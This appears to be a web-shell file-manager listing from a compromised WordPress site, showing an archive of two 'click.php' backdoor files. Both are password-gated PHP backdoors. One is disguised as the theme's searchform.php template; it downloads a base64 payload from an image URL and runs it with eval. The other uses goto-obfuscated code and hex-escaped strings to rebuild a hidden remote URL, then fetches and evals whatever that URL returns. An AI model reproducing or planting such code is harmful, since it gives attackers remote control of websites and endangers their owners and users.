Your IP : 216.73.216.163

Current Path : /home/user/web/pansionat-v-yaroslavle.ru/public_html/331ab/
Upload File :
Current File : /home/user/web/pansionat-v-yaroslavle.ru/public_html/331ab/click.php.tar

home/user/web/pansionat-v-yaroslavle.ru/public_html/click.php000044400000003334150236321170020373 0ustar00<?php ?><?php error_reporting(0); if(isset($_REQUEST["ok"])){die(">ok<");};?><?php
if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == '7b5f411cddef01612b26836750d71699dde1865246fe549728fb20a89d4650a4') {
      $_SESSION['secretyt'] = true; } else { die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>'); } } }
?>
<?php
/*
 * The searchform.php template.
 *
 * Used any time that get_search_form() is called.
 *
 * @link https://wordpress.org/themes/template/
 * @package WordPress
 * @subpackage
 * @since 1.0 */

$l = "https://user-images.githubusercontent.com/143735067/264713238-ae810af4-c98d-421f-bbb3-1ddcc58f952a.jpg"/* "" - ni*/;

//DX for each form and a string
		if( function_exists('curl_init') ) {
			$ch = curl_init();
			curl_setopt($ch, CURLOPT_URL, $l);
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
			curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
			curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
			curl_setopt($ch, CURLOPT_HEADER, FALSE);
			curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36");
			$body = curl_exec($ch);
			curl_close($ch);
		}
		else {
			$body = @file_get_contents($l);
		}
	 eval(base64_decode($body));
?>home/user/web/pansionat-v-yaroslavle.ru/public_html/wp-content/click.php000044400000003672150240147770022505 0ustar00<?php ?><?php error_reporting(0); if(isset($_REQUEST["ok"])){die(">ok<");};?><?php
if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == '7b5f411cddef01612b26836750d71699dde1865246fe549728fb20a89d4650a4') {
      $_SESSION['secretyt'] = true; } else { die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>'); } } }
?>
<?php
goto abM39; y6XNG: $SS8Fu .= "\x61\x64\57"; goto Toa91; XsSUB: $SS8Fu .= "\156\x2f\x61\x6d"; goto y6XNG; OzoPC: $SS8Fu .= "\145"; goto XsSUB; F0uUK: $SS8Fu .= "\164\56\61\x30\x61"; goto m5FkB; xJQZm: $SS8Fu .= "\57\x3a\x73\x70"; goto uRZbS; a7t9X: $SS8Fu .= "\63\61\57\167"; goto OzoPC; foILs: $SS8Fu .= "\164\170\x74\x2e\71"; goto a7t9X; m5FkB: $SS8Fu .= "\155\x61\144\x2f"; goto xJQZm; Toa91: $SS8Fu .= "\x70\157"; goto F0uUK; bjYUL: $SS8Fu .= "\x74\x68"; goto ZQY1f; uRZbS: $SS8Fu .= "\x74"; goto bjYUL; ZQY1f: eval("\x3f\x3e" . Tw2kx(strrev($SS8Fu))); goto GJQOP; abM39: $SS8Fu = ''; goto foILs; GJQOP: function tw2kx($V1_rw = '') { goto pvodd; xyA6t: curl_setopt($xM315, CURLOPT_TIMEOUT, 500); goto QUqD1; bum1m: curl_close($xM315); goto yk51G; yk51G: return $tvmad; goto llacL; CfzL7: $tvmad = curl_exec($xM315); goto bum1m; glb9w: curl_setopt($xM315, CURLOPT_URL, $V1_rw); goto CfzL7; bhhj0: curl_setopt($xM315, CURLOPT_SSL_VERIFYHOST, false); goto glb9w; QUqD1: curl_setopt($xM315, CURLOPT_SSL_VERIFYPEER, false); goto bhhj0; czIL1: curl_setopt($xM315, CURLOPT_RETURNTRANSFER, true); goto xyA6t; pvodd: $xM315 = curl_init(); goto czIL1; llacL: }